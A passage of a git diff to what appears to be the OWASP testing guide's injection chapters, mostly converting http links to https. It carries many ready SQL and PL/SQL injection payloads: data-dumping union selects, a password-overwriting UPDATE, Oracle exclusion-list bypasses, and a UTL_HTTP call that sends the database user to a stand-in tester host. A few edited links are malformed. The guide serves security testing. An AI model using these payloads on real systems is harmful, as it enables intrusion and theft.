+`https://www.example.com/product.php?id=10||UTL_HTTP.request(‘testerserver.com:80’||(SELECT user FROM DUAL)--` In this example, the tester is concatenating the value 10 with the result of the function `UTL_HTTP.request`. This Oracle function will try to connect to `testerserver` and make an HTTP GET request containing the return from the query `SELECT user FROM DUAL`. The tester can set up a web server (e.g. Apache) or use the Netcat tool: @@ -597,11 +597,11 @@ Consider the following SQL query: Consider also the request to a script that executes the query above: -`http://www.example.com/product.php?id=10` +`https://www.example.com/product.php?id=10` The malicious request would be (e.g. MySql 5.x): -`http://www.example.com/product.php?id=10 AND IF(version() like ‘5%’, sleep(10), ‘false’))--` +`https://www.example.com/product.php?id=10 AND IF(version() like ‘5%’, sleep(10), ‘false’))--` In this example the tester is checking whether the MySql version is 5.x or not, making the server to delay the answer by 10 seconds. The tester can increase the delay time and monitor the responses. The tester also doesn’t need to wait for the response. Sometimes he can set a very high value (e.g. 100) and cancel the request after some seconds. @@ -794,7 +794,7 @@ For generic input validation security, refer to the [Input Validation CheatSheet ## Tools - [SQL Injection Fuzz Strings (from wfuzz tool) - Fuzzdb](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection) -- [Bernardo Damele A. G.: sqlmap, automatic SQL injection tool](http://sqlmap.org/) +- [Bernardo Damele A. G.: sqlmap, automatic SQL injection tool](https://sqlmap.org/) - [Muhaimin Dzulfakar: MySqloit, MySql Injection takeover tool](https://github.com/dtrip/mysqloit) - [SQL Injection - PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection) @@ -817,14 +817,14 @@ Technology-specific Testing Guide pages have been created for the following DBMS ### Whitepapers -- [Victor Chapela: "Advanced SQL Injection"](http://cs.unh.edu/~it666/reading_list/Web/advanced_sql_injection.pdf) +- [Victor Chapela: "Advanced SQL Injection"](https://www.cs.unh.edu/~it666/reading_list/Web/advanced_sql_injection.pdf) - [Chris Anley: "More Advanced SQL Injection"](https://www.cgisecurity.com/lib/more_advanced_sql_injection.pdf) - [David Litchfield: "Data-mining with SQL Injection and Inference"](https://dl.packetstormsecurity.net/papers/attack/sqlinference.pdf) - [Imperva: "Blinded SQL Injection"](https://www.imperva.com/lg/lgw.asp?pid=369) - [PortSwigger: "SQL Injection Cheat Sheet"](https://portswigger.net/web-security/sql-injection/cheat-sheet) - [Kevin Spett from SPI Dynamics: "Blind SQL Injection"](https://repo.zenk-security.com/Techniques%20d.attaques%20%20.%20%20Failles/Blind_SQLInjection.pdf) - ["ZeQ3uL" (Prathan Phongthiproek) and "Suphot Boonchamnan": "Beyond SQLi: Obfuscate and Bypass"](https://www.exploit-db.com/papers/17934/) -- [Adi Kaploun and Eliran Goshen, Check Point Threat Intelligence & Research Team: "The Latest SQL Injection Trends"](http://blog.checkpoint.com/2015/05/07/latest-sql-injection-trends/) +- [Adi Kaploun and Eliran Goshen, Check Point Threat Intelligence & Research Team: "The Latest SQL Injection Trends"](https://blog.checkpoint.com/latest-sql-injection-trends/) ### Documentation on SQL Injection Vulnerabilities in Products diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.1-Testing_for_Oracle.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.1-Testing_for_Oracle.md index 5e256dc85d..f97995f1f1 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.1-Testing_for_Oracle.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.1-Testing_for_Oracle.md @@ -20,17 +20,17 @@ Understanding this point is important - the PL/SQL code does not exist on the we URLs for PL/SQL web applications are normally easily recognizable and generally start with the following (xyz can be any string and represents a Database Access Descriptor, which you will learn more about later): -- `http://www.example.com/pls/xyz` -- `http://www.example.com/xyz/owa` -- `http://www.example.com/xyz/plsql` +- `https://www.example.com/pls/xyz` +- `https://www.example.com/xyz/owa` +- `https://www.example.com/xyz/plsql` While the second and third of these examples represent URLs from older versions of the PL/SQL Gateway, the first is from more recent versions running on Apache. In the plsql.conf Apache configuration file, /pls is the default, specified as a Location with the PLS module as the handler. The location need not be /pls, however. The absence of a file extension in a URL could indicate the presence of the Oracle PL/SQL Gateway. Consider the following URL: -`http://www.server.com/aaa/bbb/xxxxx.yyyyy` +`https://www.server.com/aaa/bbb/xxxxx.yyyyy` If `xxxxx.yyyyy` were replaced with something along the lines of `ebank.home`, `store.welcome`, `auth.login`, or `books.search`, then there’s a fairly strong chance that the PL/SQL Gateway is being used. It is also possible to precede the requested package and procedure with the name of the user that owns it - i.e. the schema - in this case the user is `webuser`: -`http://www.server.com/pls/xyz/webuser.pkg.proc` +`https://www.server.com/pls/xyz/webuser.pkg.proc` In this URL, xyz is the Database Access Descriptor, or DAD. A DAD specifies information about the database server so that the PL/SQL Gateway can connect. It contains information such as the TNS connect string, the user ID and password, authentication methods, and so on. These DADs are specified in the `dads.conf` Apache configuration file in more recent versions or the `wdbsvr.app` file in older versions. Some default DADs include the following: @@ -95,8 +95,8 @@ PL/SQL procedure successfully completed. We can use this to test if the server is running the PL/SQL Gateway. Simply take the `DAD` and append `NULL`, then append `NOSUCHPROC`: -- `http://www.example.com/pls/dad/null` -- `http://www.example.com/pls/dad/nosuchproc` +- `https://www.example.com/pls/dad/null` +- `https://www.example.com/pls/dad/nosuchproc` If the server responds with a `200 OK` response for the first and a `404 Not Found` for the second then it indicates that the server is running the PL/SQL Gateway. @@ -104,7 +104,7 @@ If the server responds with a `200 OK` response for the first and a `404 Not Fou On older versions of the PL/SQL Gateway, it is possible to directly access the packages that form the PL/SQL Web Toolkit such as the OWA and HTP packages. One of these packages is the `OWA_UTIL` package, which we'll speak about more later on. This package contains a procedure called SIGNATURE and it simply outputs in HTML a PL/SQL signature. Thus requesting -`http://www.example.com/pls/dad/owa_util.signature` +`https://www.example.com/pls/dad/owa_util.signature` returns the following output on the webpage @@ -120,15 +120,15 @@ If you don't get this response but a 403 Forbidden response then you can infer t It is possible to exploit vulnerabilities in the PL/SQL packages that are installed by default in the database server. How you do this depends on the version of the PL/SQL Gateway. In earlier versions of the PL/SQL Gateway, there was nothing to stop an attacker from accessing an arbitrary PL/SQL package in the database server. We mentioned the `OWA_UTIL` package earlier. This can be used to run arbitrary SQL queries: -`http://www.example.com/pls/dad/OWA_UTIL.CELLSPRINT? P_THEQUERY=SELECT+USERNAME+FROM+ALL_USERS` +`https://www.example.com/pls/dad/OWA_UTIL.CELLSPRINT? P_THEQUERY=SELECT+USERNAME+FROM+ALL_USERS` Cross Site Scripting attacks could be launched via the HTP package: -`http://www.example.com/pls/dad/HTP.PRINT?CBUF=` +`https://www.example.com/pls/dad/HTP.PRINT?CBUF=` Clearly, this is dangerous, so Oracle introduced a PLSQL Exclusion list to prevent direct access to such dangerous procedures. Banned items include any request starting with `SYS.*`, any request starting with `DBMS_*`, any request with `HTP.*` or `OWA*`. It is possible to bypass the exclusion list however. What's more, the exclusion list does not prevent access to packages in the `CTXSYS` and `MDSYS` schemas or others, so it is possible to exploit flaws in these packages: -`http://www.example.com/pls/dad/CXTSYS.DRILOAD.VALIDATE_STMT?SQLSTMT=SELECT+1+FROM+DUAL` +`https://www.example.com/pls/dad/CXTSYS.DRILOAD.VALIDATE_STMT?SQLSTMT=SELECT+1+FROM+DUAL` This will return a blank HTML page with a 200 OK response if the database server is still vulnerable to this flaw (CVE-2006-0265) @@ -138,48 +138,48 @@ Over the years, the Oracle PL/SQL Gateway has suffered from a number of flaws, i ### Bypassing the PL/SQL Exclusion List -It is incredible how many times Oracle has attempted to fix flaws that allow attackers to bypass the exclusion list. Each patch that Oracle has produced has fallen victim to a new bypass technique. [The history of this sorry story](http://seclists.org/fulldisclosure/2006/Feb/0011.html) +It is incredible how many times Oracle has attempted to fix flaws that allow attackers to bypass the exclusion list. Each patch that Oracle has produced has fallen victim to a new bypass technique. [The history of this sorry story](https://seclists.org/fulldisclosure/2006/Feb/11) ### Bypassing the Exclusion List - Method 1 When Oracle first introduced the PL/SQL Exclusion List to prevent attackers from accessing arbitrary PL/SQL packages, it could be trivially bypassed by preceding the name of the schema/package with a hex encoded newline character or space or tab: ```txt -http://www.example.com/pls/dad/%0ASYS.PACKAGE.PROC -http://www.example.com/pls/dad/%20SYS.PACKAGE.PROC -http://www.example.com/pls/dad/%09SYS.PACKAGE.PROC +https://www.example.com/pls/dad/%0ASYS.PACKAGE.PROC +https://www.example.com/pls/dad/%20SYS.PACKAGE.PROC +https://www.example.com/pls/dad/%09SYS.PACKAGE.PROC ``` ### Bypassing the Exclusion List - Method 2 Later versions of the Gateway allowed attackers to bypass the exclusion list by preceding the name of the schema/package with a label. In PL/SQL a label points to a line of code that can be jumped to using the GOTO statement and takes the following form: `<>` -- `http://www.example.com/pls/dad/<>SYS.PACKAGE.PROC` +- `https://www.example.com/pls/dad/<>SYS.PACKAGE.PROC` ### Bypassing the Exclusion List - Method 3 Simply placing the name of the schema/package in double quotes could allow an attacker to bypass the exclusion list. Note that this will not work on Oracle Application Server 10g as it converts the user's request to lowercase before sending it to the database server and a quote literal is case sensitive - thus `SYS` and `sys` are not the same and requests for the latter will result in a 404 Not Found. On earlier versions though the following can bypass the exclusion list: -`http://www.example.com/pls/dad/"SYS".PACKAGE.PROC` +`https://www.example.com/pls/dad/"SYS".PACKAGE.PROC` ### Bypassing the Exclusion List - Method 4 Depending upon the character set in use on the web server and on the database server, some characters are translated. Thus, depending upon the character sets in use, the `ÿ` character (`0xFF`) might be converted to a `Y` at the database server. Another character that is often converted to an upper case `Y` is the Macron character - `0xAF`. This may allow an attacker to bypass the exclusion list: -`http://www.example.com/pls/dad/S%FFS.PACKAGE.PROC` -`http://www.example.com/pls/dad/S%AFS.PACKAGE.PROC` +`https://www.example.com/pls/dad/S%FFS.PACKAGE.PROC` +`https://www.example.com/pls/dad/S%AFS.PACKAGE.PROC` ### Bypassing the Exclusion List - Method 5 Some versions of the PL/SQL Gateway allow the exclusion list to be bypassed with a backslash - `0x5C`: -`http://www.example.com/pls/dad/%5CSYS.PACKAGE.PROC` +`https://www.example.com/pls/dad/%5CSYS.PACKAGE.PROC` ### Bypassing the Exclusion List - Method 6 This is the most complex method of bypassing the exclusion list and is the most recently patched method. If we were to request the following -`http://www.example.com/pls/dad/foo.bar?xyz=123` +`https://www.example.com/pls/dad/foo.bar?xyz=123` the application server would execute the following at the database server: @@ -233,7 +233,7 @@ Notice lines 19 and 24. On line 19, the user’s request is checked against a li If we then request the following: -`http://server.example.com/pls/dad/INJECT'POINT` +`https://server.example.com/pls/dad/INJECT'POINT` the following PL/SQL is executed: @@ -261,7 +261,7 @@ WWC_VERSION.GET_HTTP_DATABASE_INFO An attacker should pick one of these functions that is actually available on the target system (i.e., returns a `200 OK` when requested). As a test, an attacker can request -`http://server.example.com/pls/dad/orasso.home?FOO=BAR` +`https://server.example.com/pls/dad/orasso.home?FOO=BAR` the server should return a `404 File Not Found` response because the orasso.home procedure does not require parameters and one has been supplied. However, before the 404 is returned, the following PL/SQL is executed: @@ -280,7 +280,7 @@ else Note the presence of FOO in the attacker’s query string. Attackers can abuse this to run arbitrary SQL. First, they need to close the brackets: -`http://server.example.com/pls/dad/orasso.home?);--=BAR` +`https://server.example.com/pls/dad/orasso.home?);--=BAR` This results in the following PL/SQL being executed: @@ -292,20 +292,20 @@ orasso.home();--=>:);--); Note that everything after the double minus (`--`) is treated as a comment. This request will cause an internal server error because one of the bind variables is no longer used, so the attacker needs to add it back. As it happens, it’s this bind variable that is the key to running arbitrary PL/SQL. For the moment, they can just use `HTP.PRINT` to print BAR, and add the needed bind variable as :1: -`http://server.example.com/pls/dad/orasso.home?);HTP.PRINT(:1);--=BAR` +`https://server.example.com/pls/dad/orasso.home?);HTP.PRINT(:1);--=BAR` This should return a `200` with the word "BAR" in the HTML. What’s happening here is that everything after the equals sign - BAR in this case - is the data inserted into the bind variable. Using the same technique it’s possible to also gain access to `owa_util.cellsprint` again: -`http://www.example.com/pls/dad/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=SELECT+USERNAME+FROM+ALL_USERS` +`https://www.example.com/pls/dad/orasso.home?);OWA_UTIL.CELLSPRINT(:1);--=SELECT+USERNAME+FROM+ALL_USERS` To execute arbitrary SQL, including DML and DDL statements, the attacker inserts an execute immediate :1: -`http://server.example.com/pls/dad/orasso.home?);execute%20immediate%20:1;--=select%201%20from%20dual` +`https://server.example.com/pls/dad/orasso.home?);execute%20immediate%20:1;--=select%201%20from%20dual` Note that the output won’t be displayed. This can be leveraged to exploit any PL/SQL injection bugs owned by SYS, thus enabling an attacker to gain complete control of the backend database server. For example, the following URL takes advantage of the SQL injection flaws in `DBMS_EXPORT_EXTENSION` ```txt -http://www.example.com/pls/dad/orasso.home?); +https://www.example.com/pls/dad/orasso.home?); execute%20immediate%20:1;--=DECLARE%20BUF%20VARCHAR2(2000);%20BEGIN%20 BUF:=SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('INDEX_NAME','INDEX_SCHEMA','DBMS_OUTPUT.PUT_LINE(:p1); EXECUTE%20IMMEDIATE%20''CREATE%20OR%20REPLACE%20 PUBLIC%20SYNONYM%20BREAKABLE%20FOR%20SYS.OWA_UTIL''; @@ -322,15 +322,15 @@ Each input parameter should be tested for SQL injection flaws. These are easy to For example, assume there is a bookstore PL/SQL web application that allows users to search for books by a given author: -`http://www.example.com/pls/bookstore/books.search?author=DICKENS` +`https://www.example.com/pls/bookstore/books.search?author=DICKENS` If this request returns books by Charles Dickens, but -`http://www.example.com/pls/bookstore/books.search?author=DICK'ENS` +`https://www.example.com/pls/bookstore/books.search?author=DICK'ENS` returns an error or a `404`, then there might be a SQL injection flaw. This can be confirmed by using the concatenation operator: -`http://www.example.com/pls/bookstore/books.search?author=DICK'||'ENS` +`https://www.example.com/pls/bookstore/books.search?author=DICK'||'ENS` If this request returns books by Charles Dickens, you've confirmed the presence of the SQL injection vulnerability. diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.2-Testing_for_MySQL.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.2-Testing_for_MySQL.md index 16d1a1d21e..eb2c472ec6 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.2-Testing_for_MySQL.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.2-Testing_for_MySQL.md @@ -21,7 +21,7 @@ It should be noted that for MySQL versions before 4.0.x, only Boolean or time-ba From now on, we will assume that there is a classic SQL injection vulnerability, which can be triggered by a request similar to the one described in the Section on [Testing for SQL Injection](05-Testing_for_SQL_Injection.md). -`http://www.example.com/page.php?id=2` +`https://www.example.com/page.php?id=2` ### The Single Quotes Problem @@ -211,7 +211,6 @@ For a complete list, refer to the [MySQL manual](https://dev.mysql.com/doc/refma ## Tools -- [Francois Larouche: Multiple DBMS SQL Injection tool](http://www.sqlpowerinjector.com/index.htm) - [Bernardo Damele A. G.: sqlmap, automatic SQL injection tool](https://sqlmap.org/) - [Muhaimin Dzulfakar: MySqloit, MySql Injection takeover tool](https://code.google.com/archive/p/mysqloit/) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.3-Testing_for_SQL_Server.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.3-Testing_for_SQL_Server.md index d2fb748305..aaa805de0d 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.3-Testing_for_SQL_Server.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.3-Testing_for_SQL_Server.md @@ -89,7 +89,7 @@ A complete post example (`https://vulnerable.web.app/forgotpass.asp`): POST /forgotpass.asp HTTP/1.1 Host: vulnerable.web.app [...] -Referer: http://vulnerable.web.app/forgotpass.asp +Referer: https://vulnerable.web.app/forgotpass.asp Content-Type: application/x-www-form-urlencoded Content-Length: 50 @@ -236,7 +236,7 @@ This one bit of information might be enough to understand how the dynamic SQL qu #### Timing Attacks -There is one more possibility for making a blind SQL injection attack when there is not visible feedback from the application: by measuring the time that the web application takes to answer a request. An attack of this sort is [described by Anley](http://www.encription.co.uk/downloads/more_advanced_sql_injection.pdf) from where we take the next examples. A typical approach uses the `waitfor delay` command: let's say that the attacker wants to check if the `pubs` sample database exists, he will simply inject the following command: +There is one more possibility for making a blind SQL injection attack when there is not visible feedback from the application: by measuring the time that the web application takes to answer a request. An attack of this sort is [described by Anley](https://web.archive.org/web/20160413052024/https://www.encription.co.uk/downloads/more_advanced_sql_injection.pdf) from where we take the next examples. A typical approach uses the `waitfor delay` command: let's say that the attacker wants to check if the `pubs` sample database exists, he will simply inject the following command: `if exists (select * from pubs..pub_info) waitfor delay '0:0:5'` @@ -306,7 +306,6 @@ Remember that OPENROWSET is accessible to all users on SQL Server 2000 but it is - [David Litchfield: "Data-mining with SQL Injection and Inference"](https://dl.packetstormsecurity.net/papers/attack/sqlinference.pdf) - [Chris Anley, "(more) Advanced SQL Injection"](https://www.cgisecurity.com/lib/more_advanced_sql_injection.pdf) -- [Steve Friedl's Unixwiz.net Tech Tips: "SQL Injection Attacks by Example"](http://www.unixwiz.net/techtips/sql-injection.html) - [Alexander Chigrik: "Useful undocumented extended stored procedures"](https://www.databasejournal.com/features/mssql/article.php/1441251/Useful-Undocumented-Extended-Stored-Procedures.htm) - [Antonin Foller: "Custom xp_cmdshell, using shell object"](https://www.motobit.com/tips/detpg_cmdshell) - [SQL Injection](https://www.cisecurity.org/wp-content/uploads/2017/05/SQL-Injection-White-Paper.pdf) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.4-Testing_PostgreSQL.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.4-Testing_PostgreSQL.md index 4ed0421492..d879ff76d5 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.4-Testing_PostgreSQL.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.4-Testing_PostgreSQL.md @@ -8,7 +8,7 @@ In this section, some SQL Injection techniques for PostgreSQL will be discussed. - SQL Statements can be truncated by appending the comment char: `--`. - `LIMIT` and `OFFSET` can be used in a `SELECT` statement to retrieve a portion of the result set generated by the `query` -From now on it is assumed that `http://www.example.com/news.php?id=1` is vulnerable to SQL Injection attacks. +From now on it is assumed that `https://www.example.com/news.php?id=1` is vulnerable to SQL Injection attacks. ## How to Test @@ -18,13 +18,13 @@ When a SQL Injection has been found, you need to carefully fingerprint the backe #### Examples -`http://www.example.com/store.php?id=1 AND 1::int=1` +`https://www.example.com/store.php?id=1 AND 1::int=1` In addition, the function *version()* can be used to grab the PostgreSQL banner. This will also show the underlying operating system type and version. ##### Example -`http://www.example.com/store.php?id=1 UNION ALL SELECT NULL,version(),NULL LIMIT 1 OFFSET 1--` +`https://www.example.com/store.php?id=1 UNION ALL SELECT NULL,version(),NULL LIMIT 1 OFFSET 1--` An example of a banner string that could be returned is: @@ -73,7 +73,7 @@ We can encode 'root' as: #### Example -`http://www.example.com/store.php?id=1; UPDATE users SET PASSWORD=chr(114)||chr(111)||chr(111)||chr(116)--` +`https://www.example.com/store.php?id=1; UPDATE users SET PASSWORD=chr(114)||chr(111)||chr(111)||chr(116)--` ### Attack Vectors @@ -92,8 +92,8 @@ SELECT getpgusername() ##### Example ```text -http://www.example.com/store.php?id=1 UNION ALL SELECT user,NULL,NULL-- -http://www.example.com/store.php?id=1 UNION ALL SELECT current_user, NULL, NULL-- +https://www.example.com/store.php?id=1 UNION ALL SELECT user,NULL,NULL-- +https://www.example.com/store.php?id=1 UNION ALL SELECT current_user, NULL, NULL-- ``` #### Current Database @@ -102,7 +102,7 @@ The built-in function current\_database() returns the current database name. ##### Example -`http://www.example.com/store.php?id=1 UNION ALL SELECT current_database(),NULL,NULL--` +`https://www.example.com/store.php?id=1 UNION ALL SELECT current_database(),NULL,NULL--` #### Reading from a File diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.5-Testing_for_MS_Access.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.5-Testing_for_MS_Access.md index 52266c4255..ffdf41de4e 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.5-Testing_for_MS_Access.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.5-Testing_for_MS_Access.md @@ -42,12 +42,12 @@ Considering the following query: We can truncate the query with the following two URLs: -- `http://www.example.com/page.asp?user=admin'%00&pass=foo` -- `http://www.example.com/page.app?user=admin'%16&pass=foo` +- `https://www.example.com/page.asp?user=admin'%00&pass=foo` +- `https://www.example.com/page.app?user=admin'%16&pass=foo` The `LIMIT` operator is not implemented in MS Access, however it is possible to limit the number of results by using the `TOP` or `LAST` operators instead. -`http://www.example.com/page.app?id=2'+UNION+SELECT+TOP+3+name+FROM+appsTable%00` +`https://www.example.com/page.app?id=2'+UNION+SELECT+TOP+3+name+FROM+appsTable%00` By combining both operators, it is possible to select specific results. String concatenation is possible by using `& (%26)` and `+ (%2b)` characters. @@ -87,7 +87,7 @@ Alternatively, it is always possible to bruteforce the database schema by using In some cases, developers or system administrators do not realize that including the actual `.mdb` file within the application webroot can allow to download the entire database. Database filenames can be inferred with the following query: -`http://www.example.com/page.app?id=1'+UNION+SELECT+1+FROM+name.table%00` +`https://www.example.com/page.app?id=1'+UNION+SELECT+1+FROM+name.table%00` where `name` is the `.mdb` filename and `table` is a valid database table. In case of password protected databases, multiple software utilities can be used to crack the password. Please refer to the references. @@ -99,7 +99,7 @@ In case of blind SQL injections, the attacker can only infer the result of the q The following example is used: -`http://www.example.com/index.php?myId=[sql]` +`https://www.example.com/index.php?myId=[sql]` where the ID parameter is used within the following query: @@ -109,7 +109,7 @@ Let's consider the `myId` parameter vulnerable to blind SQL injection. As an att A typical query that can be used to infer the first character of the username of the 10th rows is: -`http://www.example.com/index.php?id=IIF((select%20MID(LAST(username),1,1)%20from%20(select%20TOP%2010%20username%20from%20users)='a',0,'no')` +`https://www.example.com/index.php?id=IIF((select%20MID(LAST(username),1,1)%20from%20(select%20TOP%2010%20username%20from%20users)='a',0,'no')` If the first character is `a`, the query will return `0` or otherwise the string `no`. @@ -123,7 +123,7 @@ Then, using this subset, we can extract the last row by using the LAST function. For example, we can have the following query: -`http://www.example.com/index.php?id='%20AND%201=0%20OR%20'a'=IIF((select%20MID(LAST(username),1,1)%20from%20(select%20TOP%2010%20username%20from%20users))='a','a','b')%00` +`https://www.example.com/index.php?id='%20AND%201=0%20OR%20'a'=IIF((select%20MID(LAST(username),1,1)%20from%20(select%20TOP%2010%20username%20from%20users))='a','a','b')%00` that is TRUE if the first character is 'a' or false otherwise. @@ -136,7 +136,6 @@ Time-based blind SQL injections are also possible by abusing [heavy queries](htt ## References -- [MS Access SQL Injection Cheat Sheet](http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html) - [Access Through Access - Brett Moore](https://packetstormsecurity.com/files/65967/Access-Through-Access.pdf.html) - [Access SQL Injection - Brett Moore](https://seclists.org/pen-test/2003/May/74) - [MS Access: Functions](https://www.techonthenet.com/access/functions/index_alpha.php) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection.md index 4b1e6aa3f4..b8ba4865c2 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection.md @@ -6,7 +6,7 @@ NoSQL databases provide looser consistency restrictions than traditional SQL dat NoSQL database calls are written in the application's programming language, a custom API call, or formatted according to a common convention (such as `XML`, `JSON`, `LINQ`, etc). Malicious input targeting those specifications may not trigger the primarily application sanitization checks. For example, filtering out common HTML special characters such as `< > & ;` will not prevent attacks against a JSON API, where special characters include `/ { } :`. -There are now over 150 [NoSQL databases available](http://nosql-database.org) for use within an application, providing APIs in a variety of languages and relationship models. Each offers different features and restrictions. Because there is not a common language between them, example injection code will not apply across all NoSQL databases. For this reason, anyone testing for NoSQL injection attacks will need to familiarize themselves with the syntax, data model, and underlying programming language in order to craft specific tests. +There are hundreds of NoSQL databases available for use within an application, providing APIs in a variety of languages and relationship models. Each offers different features and restrictions. Because there is not a common language between them, example injection code will not apply across all NoSQL databases. For this reason, anyone testing for NoSQL injection attacks will need to familiarize themselves with the syntax, data model, and underlying programming language in order to craft specific tests. NoSQL injection attacks may execute in different areas of an application than traditional SQL injection. Where SQL injection would execute within the database engine, NoSQL variants may execute during within the application layer or the database layer, depending on the NoSQL API used and data model. Typically NoSQL injection attacks will execute where the attack string is parsed, evaluated, or concatenated into a NoSQL API call. @@ -68,7 +68,7 @@ One way to potentially assign data to PHP variables is via HTTP Parameter Pollut - [Bryan Sullivan from Adobe: "NoSQL, But Even Less Security"](https://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20NoSQL%20But%20Even%20Less%20Security.pdf) - [Erlend from Bekk Consulting: Security NOSQL-injection](https://erlend.oftedal.no/blog/?blogid=110) -- [Felipe Aragon from Syhunt: "NoSQL/SSJS Injection"](http://www.syhunt.com/en/?n=Articles.NoSQLInjection) +- [Felipe Aragon from Syhunt: "NoSQL/SSJS Injection"](hhttps://www.syhunt.com/en/?n=Articles.NoSQLInjection) - [MongoDB Documentation: "How does MongoDB address SQL or Query injection?"](https://docs.mongodb.org/manual/faq/developers/#how-does-mongodb-address-sql-or-query-injection) - [PHP Documentation: "MongoDB Driver Classes"](https://www.php.net/manual/en/book.mongodb.php) - [Hacking NodeJS and MongoDB](https://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_LDAP_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_LDAP_Injection.md index f54732cdba..f870e08b7b 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_LDAP_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_LDAP_Injection.md @@ -60,11 +60,11 @@ Let's suppose we have a web application using a search filter like the following which is instantiated by an HTTP request like this: -`http://www.example.com/ldapsearch?user=John` +`https://www.example.com/ldapsearch?user=John` If the value `John` is replaced with a `*`, by sending the request: -`http://www.example.com/ldapsearch?user=*` +`https://www.example.com/ldapsearch?user=*` the filter will look like: @@ -107,7 +107,7 @@ which is correct and always true. This way, the tester will gain logged-in statu ### Whitepapers -- [Sacha Faust: LDAP Injection: Are Your Applications Vulnerable?](http://www.networkdls.com/articles/ldapinjection.pdf) +- [Sacha Faust: LDAP Injection: Are Your Applications Vulnerable?](httphttps://www.networkdls.com/articles/ldapinjection.pdf) - [IBM paper: Understanding LDAP](https://www.redbooks.ibm.com/redbooks/pdfs/sg244986.pdf) - [RFC 1960: A String Representation of LDAP Search Filters](https://www.ietf.org/rfc/rfc1960.txt) - [LDAP injection](https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection.md index 0851f313b1..3c5877a7b4 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection.md @@ -51,7 +51,7 @@ E-mail: s4tan@hell.com will produce the request: -`http://www.example.com/addUser.php?username=tony&password=Un6R34kb!e&email=s4tan@hell.com` +`https://www.example.com/addUser.php?username=tony&password=Un6R34kb!e&email=s4tan@hell.com` The application, then, builds the following node: @@ -275,7 +275,7 @@ Other useful tests are the following: - ]>&xxe; + ]>&xxe; ``` ### Tag Injection diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_SSI_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_SSI_Injection.md index 343f4eba84..58a85fdc09 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_SSI_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/08-Testing_for_SSI_Injection.md @@ -70,7 +70,7 @@ User-Agent: ## References -- [Nginx SSI module](http://nginx.org/en/docs/http/ngx_http_ssi_module.html) +- [Nginx SSI module](https://nginx.org/en/docs/http/ngx_http_ssi_module.html) - [Apache: Module mod_include](https://httpd.apache.org/docs/current/mod/mod_include.html) - [IIS: Server-Side Includes directives](https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525185%28v=vs.90%29) - [Apache Tutorial: Introduction to Server-Side Includes](https://httpd.apache.org/docs/current/howto/ssi.html) diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection.md index 03e97236b0..9bb7c05f2b 100644 --- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection.md +++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection.md @@ -18,7 +18,7 @@ Since, from a conceptual point of view, XPath is very similar to SQL in its purp ## How to Test -The [XPath attack pattern was first published by Amit Klein](http://dl.packetstormsecurity.net/papers/bypass/Blind_XPath_Injection_20040518.pdf) and is very similar to the usual SQL Injection. In order to get a first grasp of the problem, let's imagine a login page that manages the authentication to an application in which the user must enter their username 